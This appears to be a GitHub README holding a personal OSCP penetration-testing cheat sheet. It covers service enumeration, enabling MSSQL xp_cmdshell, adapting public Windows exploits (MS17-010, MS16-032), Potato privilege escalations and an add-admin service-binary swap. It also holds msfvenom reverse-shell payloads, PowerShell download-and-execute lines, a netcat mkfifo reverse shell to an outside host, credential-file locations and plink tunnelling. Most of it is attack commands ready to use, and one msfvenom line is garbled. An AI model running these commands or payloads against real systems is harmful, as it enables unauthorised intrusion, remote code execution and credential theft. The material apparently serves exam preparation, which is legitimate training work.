Skip to content

Latest commit

 

History

History
405 lines (300 loc) · 13.7 KB

README.md

File metadata and controls

405 lines (300 loc) · 13.7 KB

OSCP Methodology

My OSCP Methodology

Blackbox Enumeration

nmap full tcp port scan

nmap <ip> -sV -sC -O -T4 --traceroute -p - -oA ~/path/filename

Ftp

  • service -> exploit (searchsploit + google)
  • banner
  • default creds (hydra)
  • Anonymous login
  • Put files
    • if exists web service, check if web and ftp has the same path
  • nmap info

SSH

  • service -> exploit (searchsploit + google)
  • banner
  • default creds (hydra)
  • default creds with nsr (hydra)
  • nmap info

Samba

  • nmap info:

    • OS samba
    • Computer name/NetBIOS name
    • Domain name
    • Workgroup
    • OS of machine
  • service (OS samba or nmap service header (139 & 445)) -> exploit (searchsploit + google)

    nmap -sV -sC --open -T4 -p 139,445 --script=vuln --script-args=unsafe=1
  • enum4linux

  • smbclient *smbclient -L -N

    • connect to samba in a specific share with creds
      • smbclient \\ip\share -U username

MSSQL

sqsh
  • Connect to MSSQL:

    sqsh -S <ip> -U <username>
  • Enable xp_cmdshell:

    EXEC SP_CONFIGURE N'show advanced options', 1
    go

    Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. (return status = 0)

    RECONFIGURE
    go
    EXEC SP_CONFIGURE N'xp_cmdshell', 1
    go

    Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. (return status = 0)

    RECONFIGURE
    go
nmap
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<pass>,ms-sql-xp-cmdshell.cmd="net user " <ip>

Http/Https

  • Service -> exploit (searchsploit + google)

  • nmap info

  • if directories from nmap output, OPTIONS request for put http method availability.

  • nikto:

    • default
    • CGI all
  • source

  • gobuster:

    • with common.txt:

      gobuster dir -u [url] -w /usr/share/wordlists/dirb/common.txt -s '200,204,301,302,307,403,500' -e -t [number] -o common.results
      gobuster dir -u [url] -w /usr/share/wordlists/dirb/common.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.common.results
    • With big.txt:

      gobuster dir -u [url] -w /usr/share/wordlists/dirb/big.txt -s '200,204,301,302,307,403,500' -e -t [number] -o big.results
      gobuster dir -u [url] -w /usr/share/wordlists/dirb/big.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.big.results
    • With medium.txt:

      gobuster dir -u [url] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -t [number] -o medium.results
      gobuster dir -u [url] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,204,301,302,307,403,500' -e -t [number] -x .exte,.exte,.exte -o exte.medium.results
  • Play around with burpsuite (Spider, repeater)

  • if web page contains big articles qith many words use cewl:

    cewl -w custom_worlist <ip> -d <depth>

Exploits

Windows

Churrasco

Windows

MS08-067

git clone https://github.com/andyacer/ms08_067.git

  • configuration
    • pip install impacket
  • 2 reverse options for shellcoding:
    • Use the third with 443
    • Use the third with default
    • Use second with default
    • Use second with port of third or another port
  • Choose the right option of menu.
    • Find OS of machine
    • Guess lanhuage
  • Needs Listener

Windows

MS17-010

git clone https://github.com/worawit/MS17-010.git

zzz_exploit.py:
  • If needed USERNAME-"//"

  • next add the following 2 lines to below def smb

    smb_send_file(smbConn, '/root/htb/blue/puckieshell443.exe', 'C', '/puckieshell443.exe')

    service_exec(conn, r'cmd /c c:\puckieshell443.exe')

  • custom payload:

    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.28 LPORT=443 -f exe > shell.exe
  • Needs Listener

eternalblue_exploit7.py

Windows

MS10-059

Windows

MS11-046

Windows

MS15-051

Windows

MS16-032

  • use https://www.exploit-db.com/exploits/39719
  • Edit the file:
    • end of file add this Invoke-MS16-032
    • Inside th file search and find cmd.exe two times.
    • Change with shell.exe in current directory in victim which you are.
    • generate shell.exe:
      msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=6666 -f exe > shell.exe
    • serve the shell.exe to victim
    • open a listener
    • run the ps1 exploit:
      C:\windows\sysnative\windowspowershell\v1.0\powershell IEX(New-Object Net.WebClient).downloadString('http://<ip>/ms16032.ps1')

Potatos

Hot Potato

What is: Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.

Affected systems: Windows 7,8,10, Server 2008, Server 2012

Guide: https://foxglovesecurity.com/2016/01/16/hot-potato/

Use: https://github.com/foxglovesec/Potato

Rotten Potato

What is: Rotten Potato and its standalone variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges

Affetced sytsems: Windows 7,8,10, Server 2008, Server 2012, Server 2016

Guide: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ https://0xdf.gitlab.io/2018/08/04/htb-silo.html

Use: https://github.com/nickvourd/lonelypotato

  • Rotten Potato from default opens meterpreter, use lonely potato which opens in line shell

Juicy Potato

What is: Juicy potato is basically a weaponized version of the RottenPotato exploit that exploits the way Microsoft handles tokens. Through this, we achieve privilege escalation.

Affetcted Systems:

  • Windows 7 Enterprise
  • Windows 8.1 Enterprise
  • Windows 10 Enterprise
  • Windows 10 Professional
  • Windows Server 2008 R2 Enterprise
  • Windows Server 2012 Datacenter
  • Windows Server 2016 Standard

Find CLSID here: https://ohpe.it/juicy-potato/CLSID/

Warning: Juicy Potato doesn’t work in Windows Server 2019

Guides: https://0x1.gitlab.io/exploit/Windows-Privilege-Escalation/#juicy-potato-abusing-the-golden-privileges https://hunter2.gitbook.io/darthsidious/privilege-escalation/juicy-potato#:~:text=Juicy%20potato%20is%20basically%20a,this%2C%20we%20achieve%20privilege%20escalation.

Use: https://github.com/ohpe/juicy-potato

Privilege Escalation

Windows

  • systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

    • searchsploit
    • google
  • systeminfo

    • Architecture
    • Numbers of Proccessors
    • Domain
    • HotFixes
    • System Locale
    • Input Locale
  • Numbers of cores of processors:

    WMIC CPU Get DeviceID,NumberOfCores,NumberOfLogicalProcessors
  • Windows Privileges:

    whoami /priv
  • Users of system and their groups

    • net user
    • net user *Password required *groups
  • whoami /groups

  • Insecure File Permissions:

    tasklist /SVC > process.txt

    or with powershell

    Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
    icacls "<path>\<file.exe>"
    • if full access the User can modify it.

    Custom exploit: #include <stdlib.h>

    int main (){ int i; i = system ("net user evil Ev!lpass /add"); i = system ("net localgroup administrators evil /add");

    retunr 0; }

    Compile from windows: i686-w64-mingw32-gcc adduser.c -o adduser.exe

    move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"

    dir "C:\Program Files\Serviio\bin"

    net stop Servilo

    if access denied try:wmic service where caption="Serviio" get name, caption, state, startmode -> if Auto atrribute inside then will auto execute after reboot.

    whoami /priv if SeShutdownPrivilege then we can restart machine: * shutdown /r /t 0

    net localgroup Administrators

  • Unqoted Service Path:

  • Enumerating World Writable Directories:

    accesschk.exe -uws "Everyone" "C:\Program Files"
  • Applications installed versions:

    wmic product get name, version, vendor
  • Schedule tasks

    schtasks /query /fo LIST /v > schedule.txt
  • Windows-Exploit-Suggester

    • python windows-exploit-suggester.py --database 2020-08-09-mssb.xls --systeminfo grandpa.txt
  • Serlock

    • Config: Add to the last line the "Find-AllVulns"
    • Download and run Sherlock:
      echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile -
  • Watson

  • PowerUP

    • Config: add to the last line the "Invoke-AllChecks"
    • Download and run PowerUp:
      echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/PowerUp.ps1') | powershell -noprofi
  • Stored Creadentials:

    • cmdkey /list

      • if interactive module enabled 100% runas as other user
      • if domain and user exist try again runas as other user
      runas /savecred /user:<Domain>\<user> C:\<path>\<exefile>
    • Stored as plaintext or base64

      • C:\unattend.xml
      • C:\Windows\Panther\Unattend.xml
      • C:\Windows\Panther\Unattend\Unattend.xml
      • C:\Windows\system32\sysprep.inf
      • C:\Windows\system32\sysprep\sysprep.xml
    • If system is running an IIS web server the web.config file:

      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
      • C:\inetpub\wwwroot\web.config
    • Local administrators passwords can also retrieved via the Group Policy Preferences:

      • C:\ProgramData\Microsoft\Group Policy\History????\Machine\Preferences\Groups\Groups.xml
      • \????\SYSVOL\Policies????\MACHINE\Preferences\Groups\Groups.xml
    • Except of the Group.xml file the cpassword attribute can be found in other policy preference files as well such as:

      • Services\Services.xml
      • ScheduledTasks\ScheduledTasks.xml
      • Printers\Printers.xml
      • Drives\Drives.xml
      • DataSources\DataSources.xml
    • Most Windows systems they are running McAfee as their endpoint protection. The password is stored encrypted in the SiteList.xml file:

      • %AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml

MSFVENOM

EXE

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp

ASPX

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPOR WART=<port> -f aspx > shell.aspx

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war

Download files

With Powershell

powershell -command "& { iwr http://192.168.199.1/win.txt -OutFile win.txt }"

Reverse shell with nc

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

plink

→ What is plink:

Plink is a command-line connection tool similar to UNIX ssh. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink is a command line application.It makes simple interactive connection to a remote server. This means that you cannot just double-click on its icon to run it and instead you have to bring up a console window.

Example to expose ports: 445 (samba)

How to expose a port on your local machine:

[local_machine]: systemctl start ssh

→ Upload plink.exe on remote machine as binary (mode)

[remote_machine]: plink.exe -l [username] -pw [password] -R [port]:127.0.0.1:[port] [ip]

→ After that, the victim’s port will be exposed on your local machine (127.0.0.1)